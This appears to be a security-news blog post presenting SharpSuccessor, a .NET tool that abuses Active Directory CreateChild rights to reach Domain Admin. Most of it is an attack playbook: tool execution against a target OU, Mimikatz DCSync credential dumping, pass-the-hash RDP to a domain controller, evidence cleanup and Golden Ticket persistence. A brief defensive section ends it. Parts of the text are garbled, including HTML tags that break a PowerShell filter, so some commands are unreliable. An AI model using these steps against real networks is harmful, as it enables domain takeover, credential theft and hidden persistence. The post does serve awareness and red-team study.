Listen to this Post

SharpSuccessor is a .NET Proof of Concept (POC) that fully weaponizes Yuval Gordon’s BadSuccessor attack, enabling privilege escalation from “CreateChild” privileges to Domain Admin (DA). This tool allows for inline .NET execution, making it highly effective in adversary simulations.
GitHub Repository: SharpSuccessor by logangoins
You Should Know:
Prerequisites for the Attack
- “CreateChild” privileges over any Organizational Unit (OU).
- Active Directory (AD) environment with misconfigured delegation.
- Execution via .NET (inline or compiled).
Key Commands & Execution Steps
1. Compile & Execute SharpSuccessor
Clone the repository git clone https://github.com/logangoins/SharpSuccessor.git cd SharpSuccessor Compile using .NET (if needed) dotnet build Execute SharpSuccessor (inline execution) SharpSuccessor.exe --ou "TargetOU" --user "CompromisedUser" --domain "example.com"
2. Verify Permissions (Pre-Attack)
Check user privileges using PowerView
Import-Module .\PowerView.ps1
Get-ObjectAcl -Identity "TargetOU" -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "CreateChild" }
3. Post-Exploitation (Domain Admin Access)
Dump hashes using Mimikatz (after escalation) mimikatz.exe "lsadump::dcsync /domain:example.com /user:Administrator" Lateral movement via RDP xfreerdp /v:DC01.example.com /u:Administrator /pth:NTLM_HASH
4. Cleanup & Persistence (Optional)
Remove malicious child objects Remove-ADObject -Identity "CN=MaliciousObject,OU=TargetOU,DC=example,DC=com" -Confirm:$false Establish persistence via Golden Ticket mimikatz.exe "kerberos::golden /user:Administrator /domain:example.com /sid:S-1-5-21-... /krbtgt:HASH /ptt"
What Undercode Say:
The SharpSuccessor tool demonstrates how misconfigured AD permissions can lead to full domain compromise. Organizations must:
– Audit OU delegation regularly.
– Restrict “CreateChild” privileges to necessary users only.
– Monitor for suspicious child object creation in critical OUs.
For defenders, detecting this attack requires:
Hunt for unusual AD object modifications
Get-WinEvent -LogName "Security" | ? { $<em>.Id -eq 5136 -and $</em>.Message -match "CreateChild" }
Prediction:
As AD-based attacks evolve, more automated .NET/C tools like SharpSuccessor will emerge, making privilege escalation faster and harder to detect. Expect increased defensive tooling around OU delegation monitoring.
Expected Output:
- Successful Domain Admin access via SharpSuccessor.
- DCSync extraction of privileged accounts.
- Defensive logs detecting OU modifications.
For more details, visit: SharpSuccessor GitHub.
References:
Reported By: Logan Goins – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


